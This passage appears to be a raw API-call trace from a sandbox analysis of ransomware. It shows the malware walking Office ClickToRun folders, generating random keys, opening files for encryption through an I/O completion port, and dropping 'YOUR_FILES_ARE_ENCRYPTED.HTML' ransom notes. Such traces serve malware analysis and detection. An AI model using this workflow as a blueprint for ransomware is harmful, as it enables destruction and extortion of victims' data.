lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b61bc49, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b61bc49, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x632aa2, dwReserved1=0x632a08, cFileName="s320.hash", cAlternateFileName="S320~1.HAS")) returned 1 [0104.831] StrStrIW (lpFirst="s320.hash", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.831] wnsprintfW (in: pszDest=0x6a4378, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\s320.hash") returned 96 [0104.831] PathFindExtensionW (pszPath="s320.hash") returned=".hash" [0104.832] lstrlenW (lpString=".hash") returned 5 [0104.832] PathFindExtensionW (pszPath="s320.hash") returned=".hash" [0104.832] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b61bc49, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b61bc49, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x32e90800, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x38b5ce, dwReserved0=0x632aa2, dwReserved1=0x632a08, cFileName="stream.x86.x-none.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 1 [0104.832] StrStrIW (lpFirst="stream.x86.x-none.man.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.832] wnsprintfW (in: pszDest=0x6a4378, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\stream.x86.x-none.man.dat") returned 112 [0104.832] PathFindExtensionW (pszPath="stream.x86.x-none.man.dat") returned=".dat" [0104.832] lstrlenW (lpString=".dat") returned 4 [0104.832] PathFindExtensionW (pszPath="stream.x86.x-none.man.dat") returned=".dat" [0104.832] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0104.832] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\stream.x86.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\stream.x86.x-none.man.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0104.833] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=3716558) returned 1 [0104.833] GetProcessHeap () returned 0x600000 [0104.833] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b5388 [0104.835] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="66") returned 2 [0104.835] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="92") returned 2 [0104.835] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="D2") returned 2 [0104.835] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="40") returned 2 [0104.835] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="4D") returned 2 [0104.835] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="B8") returned 2 [0104.835] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="0B") returned 2 [0104.835] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="31") returned 2 [0104.835] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="AF") returned 2 [0104.835] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="25") returned 2 [0104.835] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="21") returned 2 [0104.835] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="52") returned 2 [0104.835] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="75") returned 2 [0104.835] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="11") returned 2 [0104.835] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="E3") returned 2 [0104.836] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="75") returned 2 [0104.836] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="31") returned 2 [0104.836] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="F5") returned 2 [0104.836] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="A6") returned 2 [0104.836] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="05") returned 2 [0104.836] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="15") returned 2 [0104.836] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="88") returned 2 [0104.836] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="4A") returned 2 [0104.836] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="BC") returned 2 [0104.836] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="BA") returned 2 [0104.836] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="3B") returned 2 [0104.836] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="98") returned 2 [0104.836] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="7B") returned 2 [0104.836] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="D9") returned 2 [0104.836] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="F4") returned 2 [0104.836] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="02") returned 2 [0104.836] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="3E") returned 2 [0104.836] lstrcpyW (in: lpString1=0x6c543c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\stream.x86.x-none.man.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\stream.x86.x-none.man.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\stream.x86.x-none.man.dat" [0104.836] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x6b5388, NumberOfConcurrentThreads=0x0) returned 0x274 [0104.836] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b5388, lpOverlapped=0x6b5388) returned 1 [0104.837] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b61bc49, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b61bc49, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x32e90800, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x38b5ce, dwReserved0=0x632aa2, dwReserved1=0x632a08, cFileName="stream.x86.x-none.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0 [0104.837] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0104.838] wnsprintfW (in: pszDest=0x6a4378, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0104.838] GetProcessHeap () returned 0x600000 [0104.838] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6dd4e0 [0104.838] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0104.887] WriteFile (in: hFile=0x30c, lpBuffer=0x6dd4e0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6dd4e0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0104.888] CloseHandle (hObject=0x30c) returned 1 [0104.888] GetProcessHeap () returned 0x600000 [0104.888] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0104.888] GetProcessHeap () returned 0x600000 [0104.888] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a4378 | out: hHeap=0x600000) returned 1 [0104.889] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b5f5640, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b641eb6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x6337d0, cFileName="x-none.16", cAlternateFileName="")) returned 0 [0104.889] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0104.890] wnsprintfW (in: pszDest=0x693368, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0104.890] GetProcessHeap () returned 0x600000 [0104.890] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6dd4e0 [0104.890] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0104.890] WriteFile (in: hFile=0x308, lpBuffer=0x6dd4e0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6dd4e0*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0104.891] CloseHandle (hObject=0x308) returned 1 [0104.892] GetProcessHeap () returned 0x600000 [0104.892] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0104.892] GetProcessHeap () returned 0x600000 [0104.892] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x693368 | out: hHeap=0x600000) returned 1 [0104.892] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d04153d, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d04153d, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d04153d, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x7b6, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="DeploymentConfig.0.xml", cAlternateFileName="DEPLOY~1.XML")) returned 1 [0104.892] StrStrIW (lpFirst="DeploymentConfig.0.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.893] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml") returned 62 [0104.893] PathFindExtensionW (pszPath="DeploymentConfig.0.xml") returned=".xml" [0104.893] lstrlenW (lpString=".xml") returned 4 [0104.893] PathFindExtensionW (pszPath="DeploymentConfig.0.xml") returned=".xml" [0104.893] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0104.893] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.0.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0104.893] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=1974) returned 1 [0104.893] GetProcessHeap () returned 0x600000 [0104.893] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0104.896] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="C2") returned 2 [0104.896] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="A5") returned 2 [0104.896] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="0E") returned 2 [0104.896] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="74") returned 2 [0104.896] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="CB") returned 2 [0104.896] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="BC") returned 2 [0104.896] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="E2") returned 2 [0104.896] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="D2") returned 2 [0104.896] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="8D") returned 2 [0104.896] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="8F") returned 2 [0104.896] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="E1") returned 2 [0104.896] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="59") returned 2 [0104.896] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="56") returned 2 [0104.897] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="62") returned 2 [0104.897] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="EB") returned 2 [0104.897] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="9D") returned 2 [0104.897] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="A2") returned 2 [0104.897] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="E9") returned 2 [0104.897] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="1D") returned 2 [0104.897] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="1B") returned 2 [0104.897] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="21") returned 2 [0104.897] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="41") returned 2 [0104.897] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="15") returned 2 [0104.897] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="E0") returned 2 [0104.897] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="AA") returned 2 [0104.897] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="3F") returned 2 [0104.897] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="72") returned 2 [0104.897] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="84") returned 2 [0104.897] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="75") returned 2 [0104.897] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="C0") returned 2 [0104.897] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="B1") returned 2 [0104.897] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="67") returned 2 [0104.898] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml" [0104.898] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0104.898] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0104.898] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85c5095b, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x85c5095b, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x85c5095b, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="DeploymentConfig.2.xml", cAlternateFileName="DEPLOY~2.XML")) returned 1 [0104.898] StrStrIW (lpFirst="DeploymentConfig.2.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.898] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml") returned 62 [0104.898] PathFindExtensionW (pszPath="DeploymentConfig.2.xml") returned=".xml" [0104.898] lstrlenW (lpString=".xml") returned 4 [0104.898] PathFindExtensionW (pszPath="DeploymentConfig.2.xml") returned=".xml" [0104.898] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0104.898] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.2.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0104.899] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=1382) returned 1 [0104.899] GetProcessHeap () returned 0x600000 [0104.899] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0104.900] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="23") returned 2 [0104.901] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="E6") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="E7") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="99") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="BC") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="48") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="1C") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="CB") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="75") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="18") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="6B") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="6F") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="59") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="0B") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="CD") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="77") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="60") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="71") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="F6") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="F1") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="7E") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="A5") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="85") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="A1") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="3F") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="F5") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="85") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="29") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="FD") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="C5") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="18") returned 2 [0104.901] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="1B") returned 2 [0104.902] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml" [0104.902] CreateIoCompletionPort (FileHandle=0x30c, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0104.902] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0104.902] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="MachineData", cAlternateFileName="MACHIN~1")) returned 1 [0104.902] StrStrIW (lpFirst="MachineData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.902] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData") returned 51 [0104.902] GetProcessHeap () returned 0x600000 [0104.902] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x693368 [0104.903] lstrcpyW (in: lpString1=0x693368, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData" [0104.903] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\*" [0104.903] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0104.903] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 1 [0104.903] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a4d6f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="Catalog", cAlternateFileName="")) returned 1 [0104.903] StrStrIW (lpFirst="Catalog", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.903] wnsprintfW (in: pszDest=0x693368, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog") returned 59 [0104.903] GetProcessHeap () returned 0x600000 [0104.903] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6a3370 [0104.904] lstrcpyW (in: lpString1=0x6a3370, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog" [0104.904] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*" [0104.904] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a4d6f, ftLastWriteTime.dwHighDateTime=0x1d705ed, 